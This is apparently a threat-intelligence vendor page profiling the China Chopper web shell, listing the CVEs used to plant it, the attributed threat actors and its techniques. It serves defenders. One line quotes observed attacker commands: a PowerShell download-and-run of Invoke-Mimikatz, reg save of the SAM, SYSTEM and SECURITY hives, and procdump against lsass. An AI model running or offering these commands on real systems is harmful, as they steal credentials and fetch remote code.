China Chopper is a widely reused, lightweight web shell consisting of a server-side payload and a client component. The server component accepts operator-supplied commands over HTTP POST and supports remote command execution, file upload and download, directory listing, authentication-portal discovery, password guessing, and file timestamp modification. It has been deployed to maintain persistent remote access to compromised web servers, including Microsoft Exchange and SharePoint environments, often following exploitation of public-facing application vulnerabilities. China Chopper has been used by numerous unrelated threat actors, including China-linked espionage groups such as HAFNIUM, Flax Typhoon, Soft Cell, APT10, and Weaver Ant, as well as opportunistic actors conducting cryptomining, ransomware, and other post-compromise activity. Variants have appeared as ASPX, PHP, and other server-side web-shell implementations; the documented command-terminal functionality includes Windows Command Shell execution.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
17 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2021-27065 (CVSS 7.8) is a post-authentication arbitrary file write vulnerability in Exchange. If the threat actor first authenticates with the Exchange server they could then use this vulnerability to write a file to any path on the server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
ProxyNotShell Exchange vulnerabilities (CVE-2022-41040 [CVSS:8.8], CVE-2022-41082 [CVSS:8.0])... CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, that would allow an attacker to run PowerShell in the context of the compromised system. | In known real-world attacks, threat actors have exploited the pair of vulnerabilities to deploy the China Chopper webshell on impacted Microsoft Exchange servers.
ProxyNotShell Exchange vulnerabilities (CVE-2022-41040 [CVSS:8.8], CVE-2022-41082 [CVSS:8.0])... CVE-2022-41082 allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker. | In known real-world attacks, threat actors have exploited the pair of vulnerabilities to deploy the China Chopper webshell on impacted Microsoft Exchange servers.
CVE-2021-26857 (CVSS 7.8) is an insecure deserialization vulnerability in the Unified Messaging service. Exploiting this vulnerability gives the threat actor the ability to run code as SYSTEM on the Exchange server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
eSentire is aware of reports of the widespread exploitation of the critical NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) vulnerability CVE-2023-3519 (CVSS: 9.8). It is a Remote Code Execution (RCE) vulnerability that may be exploited by a remote and unauthenticated threat actor to achieve code execution. | Shadowserver has confirmed that attacks resulted in the deployment of the ChinaChopper webshell, a tool known to be used by Chinese affiliated threat actor groups in attacks related to both espionage and ransomware deployment.
CVE-2021-26855 (CVSS 9.1) is a server-side request forgery (SSRF) vulnerability in Exchange that allows the attacker to send arbitrary HTTP requests and authenticate as the Exchange server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
On June 2nd, 2022, Atlassian disclosed a critical vulnerability impacting the Confluence collaboration tool, tracked as CVE-2022-26134; active exploitation of the vulnerability has been confirmed. CVE-2022-26134 is an unauthenticated Remote Code Execution (RCE) vulnerability that impacts all supported versions of Confluence Server and Data Center. | Attacks observed by Volexity resulted in the deployment of the open-source webshell BEHINDER, a file upload webshell, and the China Chopper webshell.
CVE-2021-26858 (CVSS 7.8) is a post-authentication arbitrary file write vulnerability in Exchange. If the threat actor first authenticates with the Exchange server they could then use this vulnerability to write a file to any path on the server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper Mitigation: Update affected Microsoft products with the latest security patches | CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper
Microsoft Exchange Server ... China Chopper webshell was installed after above activities ... Exploiting ProxyShell vulnerability | China Chopper webshell was installed after above activities
China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
CVE-2021-27857: Is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
23 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Weaver Ant maintained persistent access to an internal server for four years using the China Chopper web shell.
Like many Chinese APT groups, analysts have observed Flax Typhoon using the “China Chopper” web shell.
Like many Chinese APT groups, analysts have observed Flax Typhoon using the “China Chopper” web shell.
Like many Chinese APT groups, analysts have observed Flax Typhoon using the “China Chopper” web shell.
Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
Initial access: The attackers deployed the following China Chopper, JspSpy webshells to obtain a foothold on the victim’s network that they used to execute commands to upload files to the target machines.
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Limited exploitation of these vulnerabilities has been ongoing since at least September 2022. | CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, that would allow an attacker to run PowerShell in the context of the compromised system.
A web shell provides an operator with a way to execute commands (input) and receive its results (output) on a target system.
CVE-2022-26134 is an unauthenticated Remote Code Execution (RCE) vulnerability that impacts all supported versions of Confluence Server and Data Center. Exploitation of this vulnerability would allow an unauthenticated and remote actor to execute code on vulnerable devices
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz | reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive ... Invoke-Mimikatz ... The attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory.
The following commands were observed on a PowerShell session obtained by the exploit ... ipconfig /all
Andariel has collected large numbers of files from compromised network systems for later extraction... APT28 has retrieved internal documents from machines inside victim environments... BADNEWS crawls the victim's local drives and collects documents... many listed groups and malware collect files, documents, credentials, payment card data, or other information from compromised hosts.
Annex B lists Application Layer Protocol: Web Protocols under Command and Control.
139 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
132 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A web shell cited for comparison; it supports HTTP POST command execution, file operations, and command-terminal access through web servers.
Lightweight web shell referenced as a common reusable attacker tool for remote access and command execution.
A widely reused generic web shell used as a comparison baseline for more application-specific implants.
A widely used webshell installed on vulnerable Exchange servers to provide backdoor access after exploitation.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.